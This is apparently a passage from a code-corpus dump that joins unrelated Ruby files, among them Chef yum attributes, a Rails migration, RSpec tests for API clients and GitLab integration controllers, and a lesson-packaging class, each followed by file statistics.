default['rackspace_yum']['main']['gpgcheck'] = true # [TrueClass, FalseClass]
default['rackspace_yum']['main']['keepcache'] = false # [TrueClass, FalseClass]
default['rackspace_yum']['main']['logfile'] = '/var/log/yum.log' # /.*/
default['rackspace_yum']['main']['path'] = '/etc/yum.conf' # /.*/
default['rackspace_yum']['main']['tolerant'] = false
default['rackspace_yum']['main']['alwaysprompt'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['assumeyes'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['bandwidth'] = nil # /^\d+$/
default['rackspace_yum']['main']['bugtracker_url'] = nil # /.*/
default['rackspace_yum']['main']['clean_requirements_on_remove'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['color'] = nil # %w{ always never }
default['rackspace_yum']['main']['color_list_available_downgrade'] = nil # /.*/
default['rackspace_yum']['main']['color_list_available_install'] = nil # /.*/
default['rackspace_yum']['main']['color_list_available_reinstall'] = nil # /.*/
default['rackspace_yum']['main']['color_list_available_upgrade'] = nil # /.*/
default['rackspace_yum']['main']['color_list_installed_extra'] = nil # /.*/
default['rackspace_yum']['main']['color_list_installed_newer'] = nil # /.*/
default['rackspace_yum']['main']['color_list_installed_older'] = nil # /.*/
default['rackspace_yum']['main']['color_list_installed_reinstall'] = nil # /.*/
default['rackspace_yum']['main']['color_search_match'] = nil # /.*/
default['rackspace_yum']['main']['color_update_installed'] = nil # /.*/
default['rackspace_yum']['main']['color_update_local'] = nil # /.*/
default['rackspace_yum']['main']['color_update_remote'] = nil # /.*/
default['rackspace_yum']['main']['commands'] = nil # /.*/
default['rackspace_yum']['main']['debuglevel'] = nil # /^\d+$/
default['rackspace_yum']['main']['diskspacecheck'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['enable_group_conditionals'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['errorlevel'] = nil # /^\d+$/
default['rackspace_yum']['main']['exactarch'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['exclude'] = nil # /.*/
default['rackspace_yum']['main']['group_package_types'] = nil # /.*/
default['rackspace_yum']['main']['groupremove_leaf_only'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['history_list_view'] = nil # /.*/
default['rackspace_yum']['main']['history_record'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['history_record_packages'] = nil # /.*/
default['rackspace_yum']['main']['http_caching'] = nil # %w{ packages all none }
default['rackspace_yum']['main']['installonly_limit'] = nil # /\d+/, /keep/
default['rackspace_yum']['main']['installonlypkgs'] = nil # /.*/
default['rackspace_yum']['main']['installroot'] = nil # /.*/
default['rackspace_yum']['main']['keepalive'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['kernelpkgnames'] = nil # /.*/
default['rackspace_yum']['main']['localpkg_gpgcheck'] = nil # [TrueClass,# FalseClass]
default['rackspace_yum']['main']['max_retries'] = nil # /^\d+$/
default['rackspace_yum']['main']['mdpolicy'] = nil # %w{ packages all none }
default['rackspace_yum']['main']['metadata_expire'] = nil # /^\d+$/
default['rackspace_yum']['main']['mirrorlist_expire'] = nil # /^\d+$/
default['rackspace_yum']['main']['multilib_policy'] = nil # %w{ all best }
default['rackspace_yum']['main']['obsoletes'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['overwrite_groups'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['password'] = nil # /.*/
default['rackspace_yum']['main']['persistdir'] = nil # /.*/
default['rackspace_yum']['main']['pluginconfpath'] = nil # /.*/
default['rackspace_yum']['main']['pluginpath'] = nil # /.*/
default['rackspace_yum']['main']['plugins'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['protected_multilib'] = nil # /.*/
default['rackspace_yum']['main']['protected_packages'] = nil # /.*/
default['rackspace_yum']['main']['proxy'] = nil # /.*/
default['rackspace_yum']['main']['proxy_password'] = nil # /.*/
default['rackspace_yum']['main']['proxy_username'] = nil # /.*/
default['rackspace_yum']['main']['recent'] = nil # /^\d+$/
default['rackspace_yum']['main']['repo_gpgcheck'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['reset_nice'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['rpmverbosity'] = nil # %w{ info critical# emergency error warn debug }
default['rackspace_yum']['main']['showdupesfromrepos'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['skip_broken'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['ssl_check_cert_permissions'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['sslcacert'] = nil # /.*/
default['rackspace_yum']['main']['sslclientcert'] = nil # /.*/
default['rackspace_yum']['main']['sslclientkey'] = nil # /.*/
default['rackspace_yum']['main']['sslverify'] = nil # [TrueClass, FalseClass]
default['rackspace_yum']['main']['syslog_device'] = nil # /.*/
default['rackspace_yum']['main']['syslog_facility'] = nil # /.*/
default['rackspace_yum']['main']['syslog_ident'] = nil # /.*/
default['rackspace_yum']['main']['throttle'] = nil # [/\d+k/, /\d+M/, /\d+G/]
default['rackspace_yum']['main']['timeout'] = nil # /\d+/
default['rackspace_yum']['main']['tsflags'] = nil # /.*/
default['rackspace_yum']['main']['username'] = nil # /.*/
| 67.422222 | 104 | 0.671885 |
1804e5babc7dbf801c14ede76b9afbd885184330 | 147 | class UserAddPwDigest < ActiveRecord::Migration[6.1]
def change
change_table :users do |t|
t.string :password_digest
end
end
end
| 18.375 | 52 | 0.70068 |
086602f482da0eb24fa60baf0e4d0295ec8808da | 744 | require 'spec_helper'
describe Amazon::Associates do
describe ".item_search" do
context "when omitting required parameters" do
it "should fail" do
proc { Amazon::Associates.item_search(nil) }.should raise_error(Amazon::Associates::RequiredParameterMissing)
end
end
context "when the country is not recognized" do
it "should fail" do
proc { Amazon::Associates.item_search('ruby', :country => :asfdkjjk) }.should raise_error(Amazon::Associates::RequestError)
end
end
context "on valid request" do
before(:all) do
@response = Amazon::Associates.item_search("ruby", :item_page => 2)
end
it_should_behave_like "Amazon Associates response"
end
end
end
| 28.615385 | 131 | 0.682796 |
39a7061968bc33163934a8a5a681e8135c518775 | 1,305 | module Scripto
module PrintCommands
RESET = "\e[0m".freeze
GREEN = "\e[1;37;42m".freeze
YELLOW = "\e[1;37;43m".freeze
RED = "\e[1;37;41m".freeze
attr_accessor :verbose
# Is verbose mode turned on?
def verbose?
!!@verbose
end
# Turn on verbose mode. #vbanner, #vputs and #vprintf will start printing
# now, and file ops will be printed too.
def verbose!
@verbose = true
end
# Print a colored banner to $stderr, but only if #verbose?.
def vbanner(str = nil)
banner(str) if verbose?
end
# Puts to $stderr, but only if #verbose?.
def vputs(str = nil)
$stderr.puts(str) if verbose?
end
# Printf to $stderr, but only if #verbose?.
def vprintf(str, *args)
$stderr.printf(str, *args) if verbose?
end
# Print a colored banner to $stderr in green.
def banner(str, color: GREEN)
now = Time.new.strftime('%H:%M:%S')
s = "#{str} ".ljust(72, ' ')
$stderr.puts "#{color}[#{now}] #{s}#{RESET}"
end
# Print a yellow warning banner to $stderr.
def warning(str)
banner("Warning: #{str}", color: YELLOW)
end
# Print a red error banner to $stderr, then exit.
def fatal(str)
banner(str, color: RED)
exit(1)
end
end
end
| 23.727273 | 77 | 0.584674 |
ab155be0c44b4253ec0f1d242278f7ed53209068 | 377 | FactoryGirl.define do
factory :resource_pool do
sequence(:name) { |n| "rp_#{seq_padded_for_sorting(n)}" }
end
factory :default_resource_pool, :parent => :resource_pool do
is_default true
end
factory :default_resource_pool_with_vms, :parent => :resource_pool do
after(:create) do |rp|
rp.add_child(FactoryGirl.create(:vm_vmware))
end
end
end
| 23.5625 | 71 | 0.710875 |
08cde0f7b7e51662a8ea1143431e913488e46eee | 460 | require_relative '../message_init'
context "Proceed from Previous Message to a Class" do
source = EventStore::Messaging::Controls::Message.example
msg = EventStore::Messaging::Message::Proceed.(source, source.class)
source_metadata = source.metadata
metadata = msg.metadata
test "Constructs the class" do
assert(msg.class == source.class)
end
test "Metadata have precedence" do
assert(metadata.precedence?(source_metadata))
end
end
| 25.555556 | 70 | 0.747826 |
62d9d2680869b5cf4e80a9a2be90479335fb4563 | 140 | class AddTimezoneToUser < ActiveRecord::Migration[4.2]
def change
add_column :users, :time_zone, :string, :default => "UTC"
end
end
| 23.333333 | 61 | 0.714286 |
87552e80be6819f9c197e4c9c1ab8ee351fcf5f8 | 442 | # Copyright (c) 2015 Vault12, Inc.
# MIT License https://opensource.org/licenses/MIT
require 'errors/zax_error'
# There are no saved HPK client/session keys
# Client should prove HPK ownership to establish these keys
module Errors
class HPK_keys < ZAXError
def http_fail
@response_code = :unauthorized
super
warn "#{WARN} key/client_key not found for process command - hpk: #{dumpHex @data[:hpk]}"
end
end
end
| 26 | 95 | 0.714932 |
38b9e90332e31b4cef0a27b8729854e12afcfe36 | 7,716 | # frozen_string_literal: true
# Assessment: assessment model
class Assessment < ApplicationRecord
columns.each do |column|
case column.type
when :text
validates column.name.to_sym, length: { maximum: 2000 }
when :string
validates column.name.to_sym, length: { maximum: 200 }
end
end
has_one :reported_condition, class_name: 'ReportedCondition'
belongs_to :patient
after_save :update_patient_linelist_after_save
before_destroy :update_patient_linelist_before_destroy
def symptomatic?
symptom_groups = []
reported_condition.symptoms.each do |reported_symptom|
threshold_symptom = get_threshold_symptom(reported_symptom.name)
# Group represents how many have to be true in that group to be considered as symptomatic
symptom_group_index = threshold_symptom&.group || 1
# -1 to convert to 0-based ie: index 0 requires at least 1 true, index 1 requires at least 2 true...
symptom_group_index -= 1
symptom_passes = symptom_passes_threshold(reported_symptom.name, threshold_symptom)
symptom_groups[symptom_group_index] = 0 if symptom_groups[symptom_group_index].nil?
symptom_groups[symptom_group_index] += 1 if symptom_passes
end
symptomatic = false
symptom_groups.each_with_index { |count, index| symptomatic ||= (count >= index + 1) unless count.nil? }
symptomatic
end
# symptom_passes_threshold will return true if the REQUIRED symptom with the given name in the reported condition
# meets the definition of symptomatic as defined in the assocated ThresholdCondition
def symptom_passes_threshold(symptom_name, threshold_symptom = nil)
reported_symptom = reported_condition&.symptoms&.select { |symp| symp.name == symptom_name }&.first
# This will be the case if a symptom is no longer being tracked and the assessments table is looking for its value
return nil if reported_symptom.nil? || reported_symptom.value.nil?
threshold_symptom = get_threshold_symptom(symptom_name) if threshold_symptom.nil?
return false unless threshold_symptom&.required?
return nil if threshold_symptom.nil? || threshold_symptom.value.nil?
threshold_operator = threshold_symptom&.threshold_operator&.downcase
threshold_operator ||= 'less than'
if reported_symptom.type == 'FloatSymptom' || reported_symptom.type == 'IntegerSymptom'
return true if threshold_operator == 'less than' && reported_symptom.value < threshold_symptom.value
return true if threshold_operator == 'less than or equal' && reported_symptom.value <= threshold_symptom.value
return true if threshold_operator == 'greater than' && reported_symptom.value > threshold_symptom.value
return true if threshold_operator == 'greater than or equal' && reported_symptom.value >= threshold_symptom.value
return true if threshold_operator == 'equal' && reported_symptom.value == threshold_symptom.value
return true if threshold_operator == 'not equal' && reported_symptom.value != threshold_symptom.value
elsif reported_symptom.type == 'BoolSymptom'
return reported_symptom.value != threshold_symptom.value if threshold_operator == 'not equal'
# Bool symptom threshold_operator will fall back to equal
return true if reported_symptom.value == threshold_symptom.value
end
false
end
def get_threshold_symptom(symptom_name)
threshold_condition = reported_condition&.threshold_condition
threshold_condition&.symptoms&.select { |symp| symp.name == symptom_name }&.first
end
def get_reported_symptom_value(symptom_name)
reported_symptom = reported_condition.symptoms.select { |symp| symp.name == symptom_name }[0]
# This will be the case if a symptom is no longer being tracked and the assessments table is looking for its value
return nil if reported_symptom.nil?
reported_symptom.value
end
def all_symptom_names
reported_condition&.threshold_condition&.symptoms&.collect { |x| x.name } || []
end
def get_reported_symptom_by_name(symptom_name)
reported_condition&.symptoms&.select { |symp| symp.name == symptom_name }&.first || nil
end
def translations
I18n.backend.send(:init_translations) unless I18n.backend.initialized?
{
en: I18n.backend.send(:translations)[:en][:assessments],
es: I18n.backend.send(:translations)[:es][:assessments],
'es-PR': I18n.backend.send(:translations)[:'es-PR'][:assessments],
so: I18n.backend.send(:translations)[:so][:assessments],
fr: I18n.backend.send(:translations)[:fr][:assessments]
}
end
# Returns a representative FHIR::QuestionnaireResponse for an instance of a Sara Alert Assessment.
# https://www.hl7.org/fhir/observation.html
def as_fhir
FHIR::QuestionnaireResponse.new(
meta: FHIR::Meta.new(lastUpdated: updated_at.strftime('%FT%T%:z')),
id: id,
subject: FHIR::Reference.new(reference: "Patient/#{patient_id}"),
status: 'completed',
item: reported_condition.symptoms.enum_for(:each_with_index).collect do |s, index|
if s.type == 'IntegerSymptom'
FHIR::QuestionnaireResponse::Item.new(text: s.name,
answer: FHIR::QuestionnaireResponse::Item::Answer.new(valueInteger: s.int_value),
linkId: index.to_s)
elsif s.type == 'FloatSymptom'
FHIR::QuestionnaireResponse::Item.new(text: s.name,
answer: FHIR::QuestionnaireResponse::Item::Answer.new(valueDecimal: s.float_value),
linkId: index.to_s)
elsif s.type == 'BoolSymptom'
FHIR::QuestionnaireResponse::Item.new(text: s.name,
answer: FHIR::QuestionnaireResponse::Item::Answer.new(valueBoolean: s.bool_value),
linkId: index.to_s)
end
end
)
end
private
def update_patient_linelist_after_save
if patient.user_defined_symptom_onset.present? && !patient.symptom_onset.nil?
patient.update(
latest_assessment_at: patient.assessments.maximum(:created_at)
)
else
patient.update(
latest_assessment_at: patient.assessments.maximum(:created_at),
symptom_onset: patient.assessments.where(symptomatic: true).minimum(:created_at)
)
end
end
def update_patient_linelist_before_destroy
# latest fever or fever reducer at only needs to be updated upon deletion as it is updated in the symptom model upon symptom creation
if patient.user_defined_symptom_onset.present? && !patient.symptom_onset.nil?
patient.update(
latest_assessment_at: patient.assessments.where.not(id: id).maximum(:created_at),
latest_fever_or_fever_reducer_at: patient.assessments
.where.not(id: id)
.where_assoc_exists(:reported_condition, &:fever_or_fever_reducer)
.maximum(:created_at)
)
else
patient.update(
symptom_onset: patient.assessments.where.not(id: id).where(symptomatic: true).minimum(:created_at),
latest_assessment_at: patient.assessments.where.not(id: id).maximum(:created_at),
latest_fever_or_fever_reducer_at: patient.assessments
.where.not(id: id)
.where_assoc_exists(:reported_condition, &:fever_or_fever_reducer)
.maximum(:created_at)
)
end
end
end
| 47.925466 | 137 | 0.684033 |
21ea5463c97e33d94176f41727fc0dd65eb540e6 | 3,270 | require "spec_helper"
describe Emites::Resources::Taker do
let(:http) { Emites::Http.new("2C58AFD8E960A7BFE0BC912EBF47A960") }
let(:entity_klass) { Emites::Entities::Taker }
let(:params) do
{
email: "[email protected]",
social_reason: "My Fake, Inc",
cnpj: "01001001000113",
fancy_name: "My Fake",
city_inscription: "3304557",
state: "RJ",
city: "3",
neighborhood: "Icaraí",
street_type: "RUA",
street: "Avenida Roberto Silveira - de 472 ao fim - lado par",
number: 43,
zip_code: "24230-163",
phone: "2199999999"
}
end
subject { described_class.new(http) }
it "has a instance of Emites::Http" do
expect(subject.http).to eq http
end
it_behaves_like "bound_notifiers", [:create, :destroy]
describe "#create" do
it "creates a taker" do
VCR.use_cassette("takers/create/success") do
taker = subject.create(params)
expect(taker).to be_a(entity_klass)
expect(taker.cnpj).to eq(params[:cnpj])
end
end
it "returns RequestError" do
VCR.use_cassette("takers/create/error") do
expect {
subject.create({ email: "[email protected]" })
}.to raise_error(Emites::RequestError)
end
end
end
describe "#info" do
it "returns a Taker instance where id is 135" do
VCR.use_cassette("takers/info/success") do
taker = subject.info(135)
expect(taker).to be_a(entity_klass)
expect(taker.cnpj).to eq("01001001000113")
end
end
it "returns RequestError" do
VCR.use_cassette("takers/info/error") do
expect {
subject.info(136)
}.to raise_error(Emites::RequestError)
end
end
end
describe "#list" do
it "returns an array of takers" do
VCR.use_cassette("takers/list/success") do
entities = subject.list
expect(entities).to be_a(Emites::Entities::Collection)
entities.each do |e|
expect(e).to be_a(entity_klass)
end
end
end
end
describe "#search" do
it "returns an array of takers where CNPJ is '01001001000113'" do
VCR.use_cassette("takers/search/success") do
entities = subject.search({ cnpj: "01001001000113" })
expect(entities).to be_a(Emites::Entities::Collection)
expect(entities.count).to eq(1)
entities.each do |e|
expect(e).to be_a(entity_klass)
end
end
end
it "returns empty" do
VCR.use_cassette("takers/search/returns_empty") do
entities = subject.search({ cnpj: "1775" })
expect(entities).to be_a(Emites::Entities::Collection)
expect(entities).to be_empty
end
end
end
describe "#destroy" do
it "deletes a taker" do
VCR.use_cassette("takers/destroy/success") do
result = subject.destroy(135)
expect(result).to be_truthy
end
end
it "returns RequestError" do
VCR.use_cassette("takers/destroy/error") do
expect {
subject.destroy(136)
}.to raise_error(Emites::RequestError)
end
end
end
end
| 27.711864 | 78 | 0.599388 |
ff867538bc19aad578077b291bb9653e8c862339 | 529 | class NYTInterface
def self.fetch_stories_for_category(category)
response = HTTParty.get("https://api.nytimes.com/svc/topstories/v2/#{category}.json?api-key=rVFIgSZh3fGk0wXTzOl48y89ozhV54uh").body #abracted away category allowing this code to be used more flexible.
if response.include?("Section not found")
return nil
else
JSON.parse(response)["results"].first(3) #assigned the first three news selections for any given category to a variable
end
end
end | 44.083333 | 208 | 0.697543 |
ac30f56379ed371ba860d978c4adbde16a12b9b9 | 3,960 | require 'spec_helper'
require 'tempfile'
# Time to add your specs!
# http://rspec.info/
TMDB_API_KEY = '7a2f6eb9b6aa01651000f0a9324db835'
describe "TmdbProfile" do
before(:all) do
File.mkdirs(TMPDIR)
end
before(:each) do
# tt0465234 => National Treasure: Book of Secrets
@profile = TmdbProfile.first(:imdb_id => 'tt0465234', :api_key => TMDB_API_KEY)
end
after(:each) do
Dir.glob(File.join(TMPDIR,'tmdb_profile_spec*')).each { |filename| File.delete(filename) }
end
describe "Finder" do
it "should find by imdb_id" do
@profile.should_not == nil
end
end
describe "Contents" do
it "should find tmdb id" do
@profile.movie['idents'].first.should == '6637'
end
it "should find fanarts" do
@profile.movie['fanarts'].size.should == 3
end
it "should find posters" do
@profile.movie['posters'].size.should == 4
end
it "should find the tmdb url" do
@profile.movie['urls'].first.should == 'http://www.themoviedb.org/movie/6637'
end
it "should find the imdb_id" do
@profile.movie['imdb_ids'].first.should == 'tt0465234'
end
it "should find the title" do
@profile.movie['titles'].first.should == 'National Treasure: Book of Secrets'
end
it "should find the short_overview" do
@profile.movie['short_overviews'].first.should =~ /Benjamin Franklin Gates/
end
it "should find the type" do
@profile.movie['types'].first.should == 'movie'
end
it "should find the alternative_titles" do
@profile.movie['alternative_titles'].first.should == 'National Treasure 2'
end
it "should find the release" do
@profile.movie['releases'].first.should == '2007-12-13'
end
it "should find the score" do
@profile.movie['scores'].first.should == '1.0'
end
end
describe "XML" do
it "should be able to convert to xml" do
xml = @profile.to_xml
(xml.should_not be_nil) && (xml.length.should > 0)
end
it "should be able to convert to xml and then from xml" do
hash = nil
begin
xml = @profile.to_xml
hash = XmlSimple.xml_in(xml)
rescue
hash = nil
end
hash.should_not be_nil
end
end
describe "File" do
it "should save the profile to a file" do
filespec = get_temp_filename
profile = TmdbProfile.first(:imdb_id => 'tt0465234', :api_key => TMDB_API_KEY, :filespec => filespec)
(File.exist?(filespec).should be_true) && (File.size(filespec).should > 0)
end
# now let's test caching the profile to/from a file
it "should not create a file if a :filespec option is passed that is nil" do
profile = TmdbProfile.first(:imdb_id => 'tt0465234', :api_key => TMDB_API_KEY, :filespec => nil)
Dir.glob(File.join(TMPDIR, "imdb_profile_spec*")).empty?.should be_true
end
it "should create a file if a :filespec option is passed" do
filespec = get_temp_filename
profile = TmdbProfile.first(:imdb_id => 'tt0465234', :api_key => TMDB_API_KEY, :filespec => filespec)
(File.exist?(filespec) && (File.size(filespec) > 0)).should be_true
end
it "should load from a file if a :filespec option is passed and the file exists" do
filespec = get_temp_filename
profile1 = TmdbProfile.first(:imdb_id => 'tt0465234', :api_key => TMDB_API_KEY, :filespec => filespec)
profile2 = TmdbProfile.first(:api_key => TMDB_API_KEY, :filespec => filespec)
profile1.imdb_id.should == profile2.imdb_id
end
it "should not load from a file if a :filespec option is passed and the file does not exists" do
filespec = get_temp_filename
profile = TmdbProfile.first(:api_key => TMDB_API_KEY, :filespec => filespec)
profile.should be_nil
end
end
def get_temp_filename
outfile = Tempfile.new('tmdb_profile_spec', TMPDIR)
filespec = outfile.path
outfile.unlink
filespec
end
end
| 28.695652 | 108 | 0.658333 |
6163e162a5076fe24a68e7abf8600db5861e25f4 | 619 | class TokyoMetro::App::Renderer::TravelTimeInfo::MetaClass::MultipleRailwayLines < TokyoMetro::Factory::Decorate::MetaClass
def initialize( request , railway_line_infos )
super( request )
set_railway_line_infos( railway_line_infos )
common_procedures_when_initialize
end
include ::TokyoMetro::App::Renderer::TravelTimeInfo::MetaClass::Columns
include ::TokyoMetro::App::Renderer::TravelTimeInfo::MetaClass::Common
private
def set_railway_line_infos( railway_line_infos )
@railway_line_infos = railway_line_infos
end
def railway_line_info_base
@main_railway_line_info
end
end
| 26.913043 | 123 | 0.785137 |
03e02f3947483c4a11122f75ebd796cff3e61237 | 55 | #!/usr/bin/env ruby
require __dir__ + '/browserid.rb'
| 13.75 | 33 | 0.690909 |
bf18e74adfaa353ed68f0ad3e1f0ba26aa2f1b6a | 2,210 | require 'zip'
require_relative '../lib/presentation_merger'
class ResourcePackager
attr_accessor :download
def initialize(download)
@download = download
@lesson_parts = download.lesson_parts
end
def lesson_bundle
build_lesson_bundle.tap(&:rewind)
end
def filename
download.lesson.name.parameterize
end
private
def activities
@lesson_parts.values
end
def slide_decks
activities.map(&:slide_deck_resource).compact
end
def slide_decks_tempfiles
@slide_decks_tempfiles ||= slide_decks
.select { |slide_deck| slide_deck.file.attached? }
.map do |slide_deck|
file = Tempfile.open('ResourcePackager-') do |tempfile|
tempfile.binmode
slide_deck.file.download { |chunk| tempfile.write(chunk) }
tempfile.flush
tempfile.rewind
tempfile
end
file
end
end
def combined_slide_decks
return nil unless has_slide_decks?
@combined_slide_decks ||= PresentationMerger.write_buffer do |pres|
slide_decks_tempfiles.each do |file|
pres << file
end
end
@combined_slide_decks
ensure
slide_decks_tempfiles.each(&:close!)
@combined_slide_decks
end
def has_slide_decks?
slide_decks.any? { |slide_deck| slide_deck.file.attached? }
end
def pupil_resource_blobs
PupilResource.where(activity: activities).includes(:file_attachment).map(&:file).map(&:blob)
end
def teacher_resource_blobs
TeacherResource.where(activity: activities).includes(:file_attachment).map(&:file).map(&:blob)
end
def build_lesson_bundle
Zip::OutputStream.write_buffer do |zip|
teacher_resource_blobs.each { |blob| add_to_zip(zip, blob, resource_type: 'teacher') }
pupil_resource_blobs.each { |blob| add_to_zip(zip, blob, resource_type: 'pupil') }
add_presentation_to_zip(zip)
end
end
def add_to_zip(zip, blob, resource_type:)
zip.put_next_entry(File.join(resource_type, blob.filename.to_s))
zip.write(blob.download)
end
def add_presentation_to_zip(zip)
if has_slide_decks?
zip.put_next_entry("#{filename}.odp")
zip.write(combined_slide_decks.string)
end
end
end
| 24.285714 | 98 | 0.703167 |
115713763d889516b65b0286c1058fd35464c0d5 | 707 | module TranslationsManager
class TransifexConfigFileUpdater
def self.read_lang_map(file)
file.each_line do |line|
if line =~ /lang_map = (.*)/i
return Hash[$1.split(',').sort.map { |x| x.split(':').map(&:strip) }]
end
end
end
def self.update_lang_map(file, languages)
lines = []
languages = languages.map { |k, v| "#{k}: #{v}" }.sort.join(', ')
file.each_line do |line|
if line =~ /lang_map = (.*)/i
lines << "lang_map = #{languages}\n"
else
lines << line
end
end
file.truncate(0)
file.rewind
lines.each do |line|
file.puts line
end
end
end
end
| 22.09375 | 79 | 0.526167 |
39eb8c42cb11afdb3085187005727e5778c88885 | 1,900 | require 'selenium-webdriver'
require_relative 'treatment/processor'
def run_botascript
# 1 Find orders to execute
# => Alive, exec triggered, not processing
taff = Order.exec_scope()
# 2 Les marquer IN_PROCESS:
taff.each do |order|
order.update(processing: true)
# Marquer les ordres IN_PROCESS
end
# 3 Lance les ordres en parallèle:
sons = []
taff.each do |order|
sons << fork do
# 3.0.b S'assurer que la db est bien connected :
preventive_db_reconnection()
# 3.1 Créer le web browser:
options = Selenium::WebDriver::Chrome::Options.new
options.add_argument('--headless')
browser = Selenium::WebDriver.for :chrome#, options: options
# 3.2 Passer la main au processor qui va traiter l'ordre:
processor = Processor.new(order, browser)
processor.proceed(mode="testing")
end
# Fils mort à partir d'ici....
end
# 4 Donner 10 minutes pour finir, sinon kill :
terminated_sons =[]
begin
Timeout.timeout(60*10) do
sons.size.times {terminated_sons << Process.wait}
end
rescue Timeout::Error
unterminated_sons = sons.select{|son| !terminated_sons.include?(son) }
unterminated_sons.each do |son|
Process.kill 9, son
Process.wait son
# ENHANCEMENT: Savoir quel ordre les unterminated avaient, et créer le log de la défaite !
end
end
# 5 Enlever le IN PROCESS attribute : "processing"
taff.each do |order|
order.update(processing: false)
# Marquer les ordres NOT_IN_PROCESS
end
# 6 Remplir des logs GLOBALES d'exec de Botascript (logs.txt, pas la db !)
# => Botascript a t'il été obligé de tuer ses process fils?
key = "#{Time.now}"
value = (unterminated_sons.nil? || unterminated_sons.empty?) ? "Pas d'enfanticide" : "J'ai kill #{unterminated_sons.size} de mes enfants..."
log = "{\"#{key}\": \"#{value}\"};"
return log
end
| 29.230769 | 142 | 0.671579 |
e8fb0ee29e587ca5a5860a30932cab2eb803e3ac | 547 | # -*- ruby -*-
namespace :mspec do
desc "Synchronize mspec with another checkout"
task :sync do
unless dir = ENV['DIR']
raise "Use DIR= to specify a checkout of mspec"
end
unless File.directory?(dir)
raise "#{dir} isn't an mspec checkout. Use 'cd ~/git; git clone git://github.com/brixen/mspec.git'"
end
rsync dir + "/*", "mspec"
version = Dir.chdir(ENV['DIR']) { `git log --pretty=oneline -1`[0..7] }
sh "git add mspec/"
sh "git commit -m 'Updated MSpec source to #{version}.' mspec"
end
end
| 26.047619 | 105 | 0.61426 |
9151d1fad6da1ce94b7ee88dc0c2dd6d446c0580 | 91 | require 'test_helper'
class ClientProjectAssignmentsHelperTest < ActionView::TestCase
end
| 18.2 | 63 | 0.857143 |
79ca5553f99935aec057976090b551c13405a318 | 1,481 | module Sage300Kit
class Client
module OE
module Invoices
# Get all records:
# client.get_invoices('COMPANY')
# Get records using a range:
# client.get_invoices('COMPANY', '$skip':5, '$top':2)
# Get records using filter:
# client.get_invoices('COMPANY', '$filter':"City eq 'Miami'")
# Get records using complex filter:
# client.get_invoices('COMPANY', '$filter':"CustomerNumber eq '112321' and InvoiceAmountDue gt 0")
# Get records with subset of properties:
# client.get_invoices('COMPANY', '$select':'OrderNumber, BillTo')
#
# Query Parameters:
# $filter -> String
# $select -> Array
# $top -> Integer
# $skip - >Integer
# $count -> boolean
def get_invoices(company, options = {})
res = self.class.get("/#{company}/OE/OEInvoices", {query: options})
Sage300Kit::Object.new(res)
end
# Get record by key:
# client.get_invoice('COMPANY', 10021638)
# Get records with subset of properties:
# client.get_invoice('COMPANY', '$select':'InvoiceNumber, BillTo')
#
# Query Parameters:
# $select -> Array
def get_invoice(company, invoice_id, options = {})
res = self.class.get("/#{company}/OE/OEInvoices(#{invoice_id})", {query: options})
Sage300Kit::Object.new(res)
end
end
end
end
end
| 33.659091 | 108 | 0.56921 |
79784bad67ecd23a19b7e61d4f655f2b97c98e47 | 14,362 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Projects::ServicesController do
include JiraServiceHelper
include AfterNextHelpers
let_it_be(:project) { create(:project, :repository) }
let_it_be(:user) { create(:user) }
let_it_be(:jira_integration) { create(:jira_integration, project: project) }
let(:integration) { jira_integration }
let(:integration_params) { { username: 'username', password: 'password', url: 'http://example.com' } }
before do
sign_in(user)
project.add_maintainer(user)
end
it_behaves_like Integrations::Actions do
let(:integration_attributes) { { project: project } }
let(:routing_params) do
{
namespace_id: project.namespace,
project_id: project,
id: integration.to_param
}
end
end
describe '#test' do
context 'when the integration is not testable' do
it 'renders 404' do
allow_any_instance_of(Integration).to receive(:testable?).and_return(false)
put :test, params: project_params
expect(response).to have_gitlab_http_status(:not_found)
end
end
context 'when validations fail' do
let(:integration_params) { { active: 'true', url: '' } }
it 'returns error messages in JSON response' do
put :test, params: project_params(service: integration_params)
expect(json_response['message']).to eq 'Validations failed.'
expect(json_response['service_response']).to include "Url can't be blank"
expect(response).to be_successful
end
end
context 'when successful' do
context 'with empty project' do
let_it_be(:project) { create(:project) }
context 'with chat notification integration' do
let_it_be(:teams_integration) { project.create_microsoft_teams_integration(webhook: 'http://webhook.com') }
let(:integration) { teams_integration }
it 'returns success' do
allow_next(::MicrosoftTeams::Notifier).to receive(:ping).and_return(true)
put :test, params: project_params
expect(response).to be_successful
end
end
it 'returns success' do
stub_jira_integration_test
expect(Gitlab::HTTP).to receive(:get).with('/rest/api/2/serverInfo', any_args).and_call_original
put :test, params: project_params(service: integration_params)
expect(response).to be_successful
end
end
it 'returns success' do
stub_jira_integration_test
expect(Gitlab::HTTP).to receive(:get).with('/rest/api/2/serverInfo', any_args).and_call_original
put :test, params: project_params(service: integration_params)
expect(response).to be_successful
end
context 'when service is configured for the first time' do
let(:integration_params) do
{
'active' => '1',
'push_events' => '1',
'token' => 'token',
'project_url' => 'https://buildkite.com/organization/pipeline'
}
end
before do
allow_any_instance_of(ServiceHook).to receive(:execute).and_return(true)
end
it 'persist the object' do
do_put
expect(response).to be_successful
expect(json_response).to be_empty
expect(Integrations::Buildkite.first).to be_present
end
it 'creates the ServiceHook object' do
do_put
expect(response).to be_successful
expect(json_response).to be_empty
expect(Integrations::Buildkite.first.service_hook).to be_present
end
def do_put
put :test, params: project_params(id: 'buildkite',
service: integration_params)
end
end
end
context 'when unsuccessful' do
it 'returns an error response when the integration test fails' do
stub_request(:get, 'http://example.com/rest/api/2/serverInfo')
.to_return(status: 404)
